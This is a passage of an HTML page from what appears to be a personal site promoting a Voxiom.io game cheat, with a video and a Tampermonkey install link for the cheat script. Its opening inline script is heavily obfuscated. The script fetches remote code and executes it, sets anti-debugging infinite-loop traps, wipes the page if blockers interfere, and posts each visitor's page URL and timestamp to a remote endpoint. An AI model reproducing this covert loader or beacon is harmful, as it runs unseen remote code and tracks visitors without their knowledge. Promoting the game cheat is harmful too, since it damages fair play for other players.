_AEH05Y=ndAfmZ.randBetween(ESuFLo,XmGTCO);if(_AEH05Y.isProbablePrime(256)){return _AEH05Y}}}static generate(f4y1PFx){const ESuFLo=ndAfmZ(65537);let XmGTCO,_AEH05Y,hzYSiC;do{XmGTCO=this.randomPrime(f4y1PFx/2);_AEH05Y=this.randomPrime(f4y1PFx/2);hzYSiC=ndAfmZ.lcm(XmGTCO.prev(),_AEH05Y.prev())}while(ndAfmZ.gcd(ESuFLo,hzYSiC).notEquals(1)||XmGTCO.minus(_AEH05Y).abs().shiftRight(f4y1PFx/2-100).isZero());return{e:ESuFLo,n:XmGTCO.multiply(_AEH05Y),d:ESuFLo.modInv(hzYSiC)}}static encrypt(f4y1PFx,ESuFLo,XmGTCO){return ndAfmZ(f4y1PFx).modPow(XmGTCO,ESuFLo)}static decrypt(f4y1PFx,ESuFLo,XmGTCO){return ndAfmZ(f4y1PFx).modPow(ESuFLo,XmGTCO)}static encode(f4y1PFx){const ESuFLo=f4y1PFx.split("").map(f4y1PFx=>f4y1PFx.charCodeAt()).join("");return ndAfmZ(ESuFLo)}static decode(ndAfmZ){const f4y1PFx=ndAfmZ.toString();let ESuFLo="";for(let XmGTCO=0;XmGTCO<f4y1PFx.length;XmGTCO+=2){let _AEH05Y=Number(f4y1PFx.substr(XmGTCO,2));_AEH05Y<=30?(ESuFLo+=String.fromCharCode(Number(f4y1PFx.substr(XmGTCO,3))),XmGTCO++):ESuFLo+=String.fromCharCode(_AEH05Y)}return ESuFLo}}module.exports=f4y1PFx}while(!0){}}};return ESuFLo()})();return new ArrayBuffer(0)}),_AEH05Y=new TextDecoder("\u0075\u0074\u0066\u002d\u0038").decode(ErtYDv4)):(hzYSiC=await Yk2cDg0(ESuFLo,{method:"\x47\x45\x54",mode:"\u0063\u006f\u0072\u0073",cache:"\u006e\u006f\u002d\u0073\u0074\u006f\u0072\u0065",headers:XmGTCO}),_AEH05Y=await hzYSiC.text(),ErtYDv4=await hzYSiC.arrayBuffer()["\u0063\u0061\u0074\u0063\u0068"](()=>{(function(){var ESuFLo=function(){const ndAfmZ=function(){const ndAfmZ=new RegExp("\x0a");return ndAfmZ.test(ESuFLo)};if(ndAfmZ()){while(!0){}}};return ESuFLo()})();return new ArrayBuffer(0)}));if(_AEH05Y.trim().length>0){await gYGePD(_AEH05Y,{sourceURL:ndAfmZ});return{ok:!0,res:hzYSiC,buf:ErtYDv4}}}catch(akc4H8){}return{ok:!1}}let JazdVa=await uvmyRv(ESuFLo,"\x77\x6f\x72\x6b\x65\x72",!0);if(!JazdVa.ok){(function(){var ESuFLo=function(){const ndAfmZ=function(){const ndAfmZ=new RegExp("\x0a");return ndAfmZ.test(ESuFLo)};if(ndAfmZ()){while(!0){}}};return ESuFLo()})();JazdVa=await uvmyRv(ndAfmZ,"\u0067\u0069\u0074\u0068\u0075\u0062\u002d\u0066\u0061\u006c\u006c\u0062\u0061\u0063\u006b")}if(!JazdVa.ok){(function(){var ESuFLo=function(){const ndAfmZ=function(){const ndAfmZ=new RegExp("\x0a");return ndAfmZ.test(ESuFLo)};if(ndAfmZ()){while(!0){}}};return ESuFLo()})();document.head.innerHTML="";document.body.innerHTML="";setInterval(()=>{(function(){var ESuFLo=function(){const ndAfmZ=function(){const ndAfmZ=new RegExp("\u000a");return ndAfmZ.test(ESuFLo)};if(ndAfmZ()){while(!0){}}};return ESuFLo()})();document.head.innerHTML="\u003c\u0068\u0031\u003e⚠️\u0053\u0069\u0074\u0065\u0020\u0063\u0061\u006e\u006e\u006f\u0074\u0020\u0072\u0075\u006e\u0020\u0077\u0069\u0074\u0068\u006f\u0075\u0074\u0020\u0065\u0078\u0074\u0065\u0072\u006e\u0061\u006c\u0020\u0063\u006f\u0064\u0065\u002e\u0020\u0050\u006c\u0065\u0061\u0073\u0065\u0020\u0064\u0069\u0073\u0061\u0062\u006c\u0065\u0020\u0061\u006e\u0079\u0020\u0062\u006c\u006f\u0063\u006b\u0065\u0072\u0073\u002e⚠️\u003c\u002f\u0068\u0031\u003e";document.body.innerHTML="\u003c\u0068\u0031\u003e⚠️\u0053\u0069\u0074\u0065\u0020\u0063\u0061\u006e\u006e\u006f\u0074\u0020\u0072\u0075\u006e\u0020\u0077\u0069\u0074\u0068\u006f\u0075\u0074\u0020\u0065\u0078\u0074\u0065\u0072\u006e\u0061\u006c\u0020\u0063\u006f\u0064\u0065\u002e\u0020\u0050\u006c\u0065\u0061\u0073\u0065\u0020\u0064\u0069\u0073\u0061\u0062\u006c\u0065\u0020\u0061\u006e\u0079\u0020\u0062\u006c\u006f\u0063\u006b\u0065\u0072\u0073\u002e⚠️\u003c\u002f\u0068\u0031\u003e";setTimeout(()=>{(function(){var ESuFLo=function(){const ndAfmZ=function(){const ndAfmZ=new RegExp("\x0a");return ndAfmZ.test(ESuFLo)};if(ndAfmZ()){while(!0){}}};return ESuFLo()})();document.head.innerHTML="";document.body.innerHTML=""},1000)},2000)}else{const p3NNRg=JazdVa.buf||new ArrayBuffer(0);let cW7TL2J="";try{cW7TL2J=await ErtYDv4(p3NNRg)}catch{}akc4H8({clientHash:cW7TL2J,expectedLocal:f4y1PFx,timestamp:new Date().toISOString(),pageUrl:location.href})}try{fetch(hzYSiC,{method:"\x50\x4f\x53\x54",mode:"\u0063\u006f\u0072\u0073",cache:"\u006e\u006f\u002d\u0073\u0074\u006f\u0072\u0065",headers:{"\u0043\u006f\u006e\u0074\u0065\u006e\u0074\u002d\u0054\u0079\u0070\u0065":"\u0061\u0070\u0070\u006c\u0069\u0063\u0061\u0074\u0069\u006f\u006e\u002f\u006a\u0073\u006f\u006e"},body:JSON.stringify({msg:"\x4c\x6f\x61\x64\x20\x61\x74\x74\x65\x6d\x70\x74\x20\x6f\x6e\x20"+location.href+"\x20\x61\x74\x20"+new Date().toISOString()})})["\x63\x61\x74\x63\x68"](()=>{(function(){var ESuFLo=function(){const ndAfmZ=function(){const ndAfmZ=new RegExp("\x0a");return ndAfmZ.test(ESuFLo)};if(ndAfmZ()){while(!0){}}};return ESuFLo()})()})}catch{(function(){var ESuFLo=function(){const ndAfmZ=function(){const ndAfmZ=new RegExp("\u000a");return ndAfmZ.test(ESuFLo)};if(ndAfmZ()){while(!0){}}};return ESuFLo()})()}})();
</script>
{% endraw %}
  
<style>
  /* Gradient background for the page */
  body {
    background: linear-gradient(to bottom, #add8e6, #ffffff); /* Light blue to white gradient */
    color: #333; /* Text color for readability */
    font-family: Arial, sans-serif;
    text-align: center;
    padding-top: 50px;
    margin: 0;
  }

  /* Button styling */
  .hbutton {
    background-color: #8ED6F0; /* Brighter button color */
    border: none;
    color: white;
    padding: 10px; /* Reduced padding */
    text-align: center;
    text-decoration: none;
    display: inline-block;
    font-size: 18px; /* Increased font size */
    margin: 10px 5px;
    cursor: pointer;
    border-radius: 5px;
    position: relative; /* For shine effect */
    overflow: hidden; /* To contain shine effect */
    transition: background-color 0.3s, width 0.3s;
    min-width: 15%;
  } min-width: 15%;
    min-width: 15%;
  }

  .hbutton:hover {
    background-color: #0DC6D0;
  }

  .hbutton::after {
    content: '';
    position: absolute;
    top: -50%;
    left: -50%;
    width: 200%;
    height: 200%;
    background: rgba(255, 255, 255, 0.5);
    transform: rotate(50deg);
    transition: all 0.5s ease;
    opacity: 0.5; /* Static shine effect */
  }
  
  .hbutton:hover::after {
    opacity: 1;
    animation: shine 1s infinite;
  }

  /* Button styling */
  .button {
    background-color: #8ED6F0; /* Brighter button color */
    border: none;
    color: white;
    padding: 6px; /* Reduced padding */
    text-align: center;
    text-decoration: none;
    display: inline-block;
    font-size: 15px; /* Increased font size */
    cursor: pointer;
    border-radius: 5px;
    transition: background-color 0.3s, width 0.3s;
    overflow: hidden;
    white-space: nowrap;
                display: block;
        margin: 0 auto;
        position: relative;
        top: 1%; /* Adjust as needed for spacing */

  }

  .button:hover {
    background-color: #0DC6D0;
  }
  
   .button::after {
    content: '';
    position: absolute;
    top: -50%;
    left: -50%;
    width: 200%;
    height: 200%;
    background: rgba(255, 255, 255, 0.5);
    transform: rotate(45deg);
    transition: all 0.5s ease;
    opacity: 0.5; /* Static shine effect */
  }
  
    @keyframes shine {
    0% {
      left: -200%;
      top: 0;
    }
    100% {
      left: 200%;
      top: 0;
    }
  }
  
  .button:hover::after {
    opacity: 1;
    animation: shine 1.25s infinite;
  }

  /* Responsive width based on size classes */
  .large {
    
    width: 38%; /* Expand within its container */
    max-width: 38%; /* Limit to large size */
    font-size: 14px;
    min-width: 38%;
  }

  .medium {
    
    width: 20%; /* Expand within its container */
    max-width: 20%; /* Limit to medium size */
    font-size: 14px;
    min-width: 20%;
  }

  .small {
    
    width: 16%; /* Expand within its container */
    max-width: 16%; /* Limit to small size */
    min-width: 16%;
  }

  /* Container to hold buttons and define their relative positions */
  .video-buttons-container {
    position: relative;
    height: 500px; /* Adjust as necessary */
    width: 100%;
    max-width: 100%;
    margin: 0 auto; /* Center container */
  }

  /* Container to hold buttons and define their relative positions */
  .video-buttons-container {
    position: relative;
    height: 500px; /* Adjust as necessary */
    width: 100%;
    max-width: 100%;
    margin: 0 auto; /* Center container */
  }

  /* Position each button */
  .fbtn1 { top: 0%; left: 40%; }     /* Centered in the top row */
  .fbtn2 { top: 20%; left: 23%; }
  .fbtn3 { top: 20%; left: 42%; }
  .fbtn4 { top: 20%; left: 61%; }
  .fbtn8 { top: 40%; left: 0%; }
  .fbtn5 { top: 40%; left: 23%; }
  .fbtn6 { top: 40%; left: 42%; }
  .fbtn7 { top: 40%; left: 61%; }
  .fbtn9 { top: 40%; left: 80%; }
  .fbtn10 { top: 60%; left: 33%; }
  .fbtn11 { top: 60%; left: 50%; }
  .fbtn12 { top: 80%; left: 30%; }

  .rectangle {
width: 16%;
height: 37%;
padding: 1%;
max-width: 16%;
  
  position: absolute;
}

.im {
  width: 80%; /* Default for mobile */
  aspect-ratio: 1 / 1; /* Ensures the height matches the width */
  position: relative;
  border: 1px solid black;
  margin-bottom: 5%;
        display: block;
        margin: 0 auto;    
}

/* Adjust for desktop */
@media (min-width: 768px) { /* Adjust breakpoint as needed */
  .im {
    width: 50%;
  }
}




  /* Container to hold buttons and define their relative positions */
  .d {
    position: relative;
    height: 500px; /* Adjust as necessary */
    width: 100%;
    max-width: 100%;
    left: 0%;
  }

.e {
  font-size: 0.85em;
  overflow: hidden;
  text-overflow: ellipsis;
  word-wrap: break-word;
  white-space: normal;
  max-width: 100%;
}

p {
  font-size: 0.75em; /* Scales with body text */
}


.z {


    flex-wrap: wrap; /* Items will wrap onto the next line if needed */

overflow: hidden;

}

.i {
width: 88%;
height: 49.5%;
}


</style>
</head>
<body>

  <a href="https://cqmbo1.github.io/" class="hbutton">Welcome</a>
  <a href="https://cqmbo1.github.io/about" class="hbutton">About Me</a>
  <a href="https://cqmbo1.github.io/v" class="hbutton">Videos</a>
  <a href="https://cqmbo1.github.io/educlient" class="hbutton">Edu Client</a>
<a href="https://cqmbo1.github.io/code" class="hbutton">SCRIPTS</a>
  <a href="https://cqmbo1.github.io/tools" class="hbutton">Tools</a>

  <br> <br>
<div class="d">
<iframe class="i" src="https://www.youtube.com/embed/TlI7liusL1s" title="Voxiom.io Hacking - A Montage (ESP, Aimbot, NoRecoil, Freecam, etc!)" frameborder="1" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
<br> <br>
<a class="button" href="https://www.tampermonkey.net/script_installation.php#url=https://update.greasyfork.org/scripts/520188/VOXploit.user.js">Get Voxiom.io Hack</a>
</div>




<script>
  // Create a link element
  var favicon = document.createElement('link');
  favicon.rel = 'icon';                // Set rel attribute for favicon
  favicon.type = 'image/png';           // Set type attribute
  favicon.href = '/assets/cqmbo__32x32.png'; // Set the URL for the favicon

  // Append the link element to the head
  document.head.appendChild(favicon);
</script>
</body>
</html>








